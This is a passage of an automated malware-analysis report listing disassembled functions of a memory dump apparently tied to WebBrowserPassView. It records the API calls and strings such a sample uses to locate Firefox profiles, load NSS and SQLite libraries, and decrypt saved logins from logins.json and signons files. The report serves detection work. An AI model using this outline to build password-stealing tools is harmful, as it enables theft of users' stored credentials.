wcscat.MSVCRT ref: 00443B34
wcscpy.MSVCRT ref: 00443B5B
wcscat.MSVCRT ref: 00443B6C
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
LoadLibraryW.KERNEL32(sqlite3.dll,?,00000000,00000000), ref: 00443BA5
LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000000,00000000), ref: 00443BB3
LoadLibraryW.KERNEL32(nss3.dll,?,00000000,00000000), ref: 00443BC3
GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00443BF8
GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00443C05
GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00443C12
GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00443C1F
GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00443C2C
GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00443C39
GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00443C46

Strings

\mozsqlite3.dll, xrefs: 00443B2E
sqlite3_step, xrefs: 00443BED
sqlite3_exec, xrefs: 00443C3B
sqlite3_open, xrefs: 00443BD9
\sqlite3.dll, xrefs: 00443AF7
sqlite3_prepare, xrefs: 00443BE1
\nss3.dll, xrefs: 00443B66
sqlite3_close, xrefs: 00443C2E
sqlite3_column_int64, xrefs: 00443C14
sqlite3_column_int, xrefs: 00443C07
sqlite3_finalize, xrefs: 00443C21
sqlite3_column_text, xrefs: 00443BFA
mozsqlite3.dll, xrefs: 00443BAE
sqlite3.dll, xrefs: 00443BA0
nss3.dll, xrefs: 00443BBE

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
API String ID: 2522319644-522817110
Opcode ID: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
Instruction ID: 5ad66febf3ba3de4182efca1dfca8304e8a02b444a88a93b5109a45c6fbe2280
Opcode Fuzzy Hash: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
Instruction Fuzzy Hash: 0E5153B1940719AAEB20FFA28D49F47B6E8AF58B04F1109ABE549D2141E77CE644CF18

Uniqueness

Uniqueness Score: -1.00%

Function 004136DC, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00413709
GetDlgItem.USER32 ref: 00413715
GetWindowLongW.USER32(00000000,000000F0), ref: 00413724
GetWindowLongW.USER32(?,000000F0), ref: 00413730
GetWindowLongW.USER32(00000000,000000EC), ref: 00413739
GetWindowLongW.USER32(?,000000EC), ref: 00413745
GetWindowRect.USER32 ref: 00413757
GetWindowRect.USER32 ref: 00413762
MapWindowPoints.USER32 ref: 00413776
MapWindowPoints.USER32 ref: 00413784
GetDC.USER32 ref: 004137BD
wcslen.MSVCRT ref: 004137FD
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0041380E
ReleaseDC.USER32 ref: 0041385B
_snwprintf.MSVCRT ref: 0041391E
SetWindowTextW.USER32(?,?), ref: 00413932
SetWindowTextW.USER32(?,00000000), ref: 00413950
GetDlgItem.USER32 ref: 00413986
GetWindowRect.USER32 ref: 00413996
MapWindowPoints.USER32 ref: 004139A4
GetClientRect.USER32 ref: 004139BB
GetWindowRect.USER32 ref: 004139C5
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00413A0B
GetClientRect.USER32 ref: 00413A15
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00413A4D

Strings

STATIC, xrefs: 004138BD
EDIT, xrefs: 004138F3
%s:, xrefs: 00413913

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
Instruction ID: eaed71e83b935c0691042ece96cd3f4181ba93c5b62309cd5e6c1ba419c0f7d3
Opcode Fuzzy Hash: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
Instruction Fuzzy Hash: 8AB1CE71108701AFDB21DFA8C985A6BBBF9FB88704F004A2EF59582261DB75E904CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0040109F, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 004010F7
ChildWindowFromPoint.USER32 ref: 00401109
GetDlgItem.USER32 ref: 0040113F
ChildWindowFromPoint.USER32 ref: 0040114C
GetDlgItem.USER32 ref: 0040117A
ChildWindowFromPoint.USER32 ref: 0040118C
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401195
LoadCursorW.USER32(00000000,00000067), ref: 0040119E
SetCursor.USER32(00000000,?,?), ref: 004011A5
GetDlgItem.USER32 ref: 004011C6
ChildWindowFromPoint.USER32 ref: 004011D3
GetDlgItem.USER32 ref: 004011ED
SetBkMode.GDI32(?,00000001), ref: 004011F9
SetTextColor.GDI32(?,00C00000), ref: 00401207
GetSysColorBrush.USER32(0000000F), ref: 0040120F
GetDlgItem.USER32 ref: 00401230
EndDialog.USER32(?,?), ref: 00401265
DeleteObject.GDI32(?), ref: 00401271
GetDlgItem.USER32 ref: 00401296
ShowWindow.USER32(00000000), ref: 0040129F
GetDlgItem.USER32 ref: 004012AB
ShowWindow.USER32(00000000), ref: 004012AE
SetDlgItemTextW.USER32 ref: 004012BF
SetWindowTextW.USER32(?,WebBrowserPassView), ref: 004012CD
SetDlgItemTextW.USER32 ref: 004012E5
SetDlgItemTextW.USER32 ref: 004012F6

Strings

WebBrowserPassView, xrefs: 004012C5

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: WebBrowserPassView
API String ID: 829165378-2171583229
Opcode ID: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
Instruction ID: da1635bf63897f0d85a147e608c4a0468d220b7f7222c61bbc2b07ca64c81474
Opcode Fuzzy Hash: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
Instruction Fuzzy Hash: 4751BF34500B08EBDF22AF60CC45E6E7BB5FB04341F104A3AF952A65F1C7B9A950EB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040716C, Relevance: 42.2, APIs: 11, Strings: 13, Instructions: 221COMMON

Download Yara Rule

APIs

Part of subcall function 0040AE5E: GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
Part of subcall function 0040AE5E: CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC

Part of subcall function 0040AF0C: _wcsicmp.MSVCRT ref: 0040AF46

memset.MSVCRT ref: 004071FD
memset.MSVCRT ref: 00407212
_wtoi.MSVCRT ref: 00407306
_wcsicmp.MSVCRT ref: 0040731A
memset.MSVCRT ref: 0040733B
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?), ref: 0040736F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00407386
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040739D
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073B4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073CB

Part of subcall function 00407150: _wtoi64.MSVCRT ref: 00407154

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004073E2

Part of subcall function 00406FCE: memset.MSVCRT ref: 00406FF4
Part of subcall function 00406FCE: memset.MSVCRT ref: 00407008
Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
Part of subcall function 00406FCE: strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
Part of subcall function 00406FCE: strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
Part of subcall function 00406FCE: wcscpy.MSVCRT ref: 0040709D
Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
Part of subcall function 00406FCE: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD

Strings

logins, xrefs: 004071A3
{@, xrefs: 00407187
hostname, xrefs: 0040721A
encryptedPassword, xrefs: 00407234
timeCreated, xrefs: 00407268
timeLastUsed, xrefs: 00407275
timesUsed, xrefs: 0040728F
null, xrefs: 00407312
passwordField, xrefs: 0040724E
httpRealm, xrefs: 0040725B
timePasswordChanged, xrefs: 00407282
usernameField, xrefs: 00407241
encryptedUsername, xrefs: 00407227

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$memset$strcpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$logins$null$passwordField$timeCreated$timeLastUsed$timePasswordChanged$timesUsed$usernameField${@
API String ID: 249851626-1964116028
Opcode ID: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
Instruction ID: c3ecdf3b596e70815539cea729ffc079dd9e4b065ea23c8e33f814b0aa12875c
Opcode Fuzzy Hash: f83336717777015bdd387c70ff19f8d8dea43565f379cc6d354a67410e16ebc2
Instruction Fuzzy Hash: 48717FB1D40219AEEF10EBA2DC82DEEB778EF40318F1041BBB514B61D1DA785E548F69

Uniqueness

Uniqueness Score: -1.00%

Function 004113C8, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 0041140D
GetDlgItem.USER32 ref: 00411425
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00411443
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0041144F
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00411457
memset.MSVCRT ref: 0041147E
memset.MSVCRT ref: 004114A0
memset.MSVCRT ref: 004114B9
memset.MSVCRT ref: 004114CD
memset.MSVCRT ref: 004114E7
memset.MSVCRT ref: 004114FC
GetCurrentProcess.KERNEL32 ref: 00411504
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00411527
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00411559
memset.MSVCRT ref: 004115AC
GetCurrentProcessId.KERNEL32 ref: 004115BA
memcpy.MSVCRT ref: 004115E8
wcscpy.MSVCRT ref: 0041160B
_snwprintf.MSVCRT ref: 0041167A
SetDlgItemTextW.USER32 ref: 00411692
GetDlgItem.USER32 ref: 0041169C
SetFocus.USER32(00000000), ref: 004116A3

Strings

{Unknown}, xrefs: 00411492
Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0041166F

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
Instruction ID: 77b13c0c11c75301577e42814f96b51b4b1d428f570956a2458bc96a91f7f52b
Opcode Fuzzy Hash: 90da657ec00e0420fe607ad2b08ab2d4d1c9452f0f92480a5461980c4d7a2d07
Instruction Fuzzy Hash: A17193B280021CBFEF219B51DD45EDA376DEB49355F04407BF608A2162EB79DE848F68

Uniqueness

Uniqueness Score: -1.00%

Function 00411760, Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411781
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
memset.MSVCRT ref: 004117F1
wcslen.MSVCRT ref: 004117FE
wcslen.MSVCRT ref: 0041180D
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0
GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 004118CC
GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 004118D8

Part of subcall function 00406B51: memset.MSVCRT ref: 00406B72
Part of subcall function 00406B51: memset.MSVCRT ref: 00406BBF
Part of subcall function 00406B51: RegCloseKey.ADVAPI32(00411799), ref: 00406CF9
Part of subcall function 00406B51: wcscpy.MSVCRT ref: 00406D07
Part of subcall function 00406B51: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406D22
Part of subcall function 00406B51: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406D62

Strings

NSS_Shutdown, xrefs: 00411892
PK11SDR_Decrypt, xrefs: 004118CE
PK11_GetInternalKeySlot, xrefs: 0041189E
PK11_FreeSlot, xrefs: 004118AA
PK11_CheckUserPassword, xrefs: 004118B6
PK11_Authenticate, xrefs: 004118C2
NSS_Init, xrefs: 00411889
nss3.dll, xrefs: 004117F9, 00411821

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 2554026968-4029219660
Opcode ID: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
Instruction ID: 97ddbdf8ae905254a000a89cdfb80c97087349b9056a3f7eb9cac2f120fabdad
Opcode Fuzzy Hash: 7c93af92ebe1cbc07e734f03157ceb35d9bfa718ada41e904e5ecd81d5fd5f56
Instruction Fuzzy Hash: D2419271940308ABDB20AF61CC85E9AB7F8FF58344F10486FE295D3151EBB8D9848B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00407991, Relevance: 40.5, APIs: 18, Strings: 5, Instructions: 259COMMON

Download Yara Rule

APIs

Part of subcall function 00411760: memset.MSVCRT ref: 00411781
Part of subcall function 00411760: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 004117CA
Part of subcall function 00411760: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 004117D7
Part of subcall function 00411760: memset.MSVCRT ref: 004117F1
Part of subcall function 00411760: wcslen.MSVCRT ref: 004117FE
Part of subcall function 00411760: wcslen.MSVCRT ref: 0041180D
Part of subcall function 00411760: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00411848
Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 00411864
Part of subcall function 00411760: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0041187B
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Init), ref: 00411890
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0041189C
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 004118A8
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 004118B4
Part of subcall function 00411760: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 004118C0

memset.MSVCRT ref: 004079D1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
memset.MSVCRT ref: 00407A23
memset.MSVCRT ref: 00407A3B
memset.MSVCRT ref: 00407A53
memset.MSVCRT ref: 00407A6B
memset.MSVCRT ref: 00407A83
wcslen.MSVCRT ref: 00407A8E
wcslen.MSVCRT ref: 00407A9C
wcslen.MSVCRT ref: 00407ACB
wcslen.MSVCRT ref: 00407AD9
wcslen.MSVCRT ref: 00407B08
wcslen.MSVCRT ref: 00407B16
wcslen.MSVCRT ref: 00407B45
wcslen.MSVCRT ref: 00407B53
wcslen.MSVCRT ref: 00407B82
wcslen.MSVCRT ref: 00407B90
SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Part of subcall function 00408250: GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254

Part of subcall function 0040744D: memset.MSVCRT ref: 0040748C
Part of subcall function 0040744D: memset.MSVCRT ref: 0040750B
Part of subcall function 0040744D: memset.MSVCRT ref: 00407520

Strings

signons3.txt, xrefs: 00407B0F, 00407B24
logins.json, xrefs: 00407B89, 00407B9E
signons.sqlite, xrefs: 00407B4C, 00407B61
signons2.txt, xrefs: 00407AD2, 00407AE7
signons.txt, xrefs: 00407A95, 00407AAA

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memset$AddressProc$CurrentDirectory$LibraryLoad$AttributesByteCharFileHandleModuleMultiWidewcscatwcscpy
String ID: logins.json$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3287676187-2852686199
Opcode ID: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
Instruction ID: 7d0a504a01980ca961e130c4bf0e7e2836c0561e9ae5ad9b50c10663cf81d5b6
Opcode Fuzzy Hash: 6d2dbc4a8d8c8c239b25a6953494f436143b7a42b7e5b6c63bed29ca333ff50f
Instruction Fuzzy Hash: 1F91947180811DABEF11EF51DC41A9E77B8FF44319F1004ABF908E2191EB79AA548B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00411158, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 171COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041117B
wcslen.MSVCRT ref: 00411183
wcslen.MSVCRT ref: 0041118F
wcscpy.MSVCRT ref: 00411206
wcscpy.MSVCRT ref: 00411217
memset.MSVCRT ref: 00411230
memset.MSVCRT ref: 00411245
_snwprintf.MSVCRT ref: 0041125F
memset.MSVCRT ref: 0041129E
wcslen.MSVCRT ref: 004112AE
wcslen.MSVCRT ref: 004112BC
wcscpy.MSVCRT ref: 00411272

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

wcscpy.MSVCRT ref: 00411303
memset.MSVCRT ref: 00411332
memset.MSVCRT ref: 00411347
_snwprintf.MSVCRT ref: 00411363
wcscpy.MSVCRT ref: 00411376

Strings

Profile%d, xrefs: 0041124B, 00411355
General, xrefs: 00411211
profiles.ini, xrefs: 00411188, 004111A4
Path, xrefs: 0041138B
IsRelative, xrefs: 004113A6

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
String ID: General$IsRelative$Path$Profile%d$profiles.ini
API String ID: 3014334669-2600475665
Opcode ID: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
Instruction ID: c42e31a804922eed0ec5ba890dd8b4603cdc71837868ac6ae30ebb97505d8267
Opcode Fuzzy Hash: 8b331d522e2951b2ba0f7e24a9ab3c25202a03d20dbedb5e26c57a336433e963
Instruction Fuzzy Hash: 7D51557290122CAAEB20EB55CD45FDEB7BCAF55344F1040E7B508A2151EF789B848F99

Uniqueness

Uniqueness Score: -1.00%

Function 00403768, Relevance: 36.1, APIs: 24, Instructions: 84windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0B9
Part of subcall function 0040E076: memset.MSVCRT ref: 0040E0CE
Part of subcall function 0040E076: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
Part of subcall function 0040E076: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
Part of subcall function 0040E076: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
Part of subcall function 0040E076: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E19F
Part of subcall function 0040E076: GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
Part of subcall function 0040E076: LoadImageW.USER32 ref: 0040E1BC
Part of subcall function 0040E076: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
Part of subcall function 0040E076: GetSysColor.USER32(0000000F), ref: 0040E1D5

GetModuleHandleW.KERNEL32(00000000), ref: 0040377A
LoadIconW.USER32(00000000,00000072), ref: 00403785
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403796
GetModuleHandleW.KERNEL32(00000000), ref: 0040379A
LoadIconW.USER32(00000000,00000074), ref: 0040379F
ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 004037AA
GetModuleHandleW.KERNEL32(00000000), ref: 004037AE
LoadIconW.USER32(00000000,00000073), ref: 004037B3
ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 004037BE
GetModuleHandleW.KERNEL32(00000000), ref: 004037C2
LoadIconW.USER32(00000000,00000075), ref: 004037C7
ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 004037D2
GetModuleHandleW.KERNEL32(00000000), ref: 004037D6
LoadIconW.USER32(00000000,0000006F), ref: 004037DB
ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 004037E6
GetModuleHandleW.KERNEL32(00000000), ref: 004037EA
LoadIconW.USER32(00000000,00000076), ref: 004037EF
ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 004037FA
GetModuleHandleW.KERNEL32(00000000), ref: 004037FE
LoadIconW.USER32(00000000,00000077), ref: 00403803
ImageList_ReplaceIcon.COMCTL32(?,00000006,00000000), ref: 0040380E
GetModuleHandleW.KERNEL32(00000000), ref: 00403812
LoadIconW.USER32(00000000,00000070), ref: 00403817
ImageList_ReplaceIcon.COMCTL32(?,00000007,00000000), ref: 00403822

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: IconImage$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 715923342-0
Opcode ID: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
Instruction ID: b7e10a9324f3d83bf9194ece928487740f847c1137f1a2c01f1b8e69b6e47de2
Opcode Fuzzy Hash: 620d69d8077533c60e47300747d931a5e3fb9ffd49415cf9926755a482ff0520
Instruction Fuzzy Hash: 1711F160B857087AFA3137B2DC4BF7B7A5EDF81B85F114414F35D990E0C9E6AC105928

Uniqueness

Uniqueness Score: -1.00%

Function 0040E076, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040E0B9
memset.MSVCRT ref: 0040E0CE
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040E0E0
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040E0FE
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E117
ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E122
SendMessageW.USER32(?,00001003,00000001,?), ref: 0040E13B
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040E14F
ImageList_SetImageCount.COMCTL32(00000000,00000008), ref: 0040E15A
SendMessageW.USER32(?,00001003,00000000,?), ref: 0040E172
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040E17E
GetModuleHandleW.KERNEL32(00000000), ref: 0040E18D
LoadImageW.USER32 ref: 0040E19F
GetModuleHandleW.KERNEL32(00000000), ref: 0040E1AA
LoadImageW.USER32 ref: 0040E1BC
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040E1CD
GetSysColor.USER32(0000000F), ref: 0040E1D5
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040E1F0
ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040E200
DeleteObject.GDI32(?), ref: 0040E20C
DeleteObject.GDI32(?), ref: 0040E212
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040E22F

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
Instruction ID: d1f198460081c9bd407666b3734bdbb6004887ae833e7bd4338906f330e243fe
Opcode Fuzzy Hash: 0e0f0537c5a9146dc27172f456af1fd8f34a183f9f4551b6ad3cfb99057e354f
Instruction Fuzzy Hash: F241E975640704BFEB20AF70DC4AF9777ADFB09705F000829F399A91D1CAF5A8508B29

Uniqueness

Uniqueness Score: -1.00%

Function 00414847, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414869
memset.MSVCRT ref: 0041487E
wcscpy.MSVCRT ref: 004148B0
_snwprintf.MSVCRT ref: 004148D0
wcscat.MSVCRT ref: 004148DD
_snwprintf.MSVCRT ref: 0041490C
wcscat.MSVCRT ref: 00414919
wcscat.MSVCRT ref: 00414927
wcscat.MSVCRT ref: 00414939
wcscat.MSVCRT ref: 00414944
wcscat.MSVCRT ref: 00414956
wcscat.MSVCRT ref: 00414968

Strings

color="#%s", xrefs: 004148FB
<font, xrefs: 004148AA
</b>, xrefs: 00414950
</font>, xrefs: 00414962
<b>, xrefs: 00414933
size="%d", xrefs: 004148BF

Memory Dump Source

Source File: 00000006.00000002.405206241.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: fea471720f089f9426c79df6b96a0c1db0a5d7cfe671986570c98e4288bdff5f
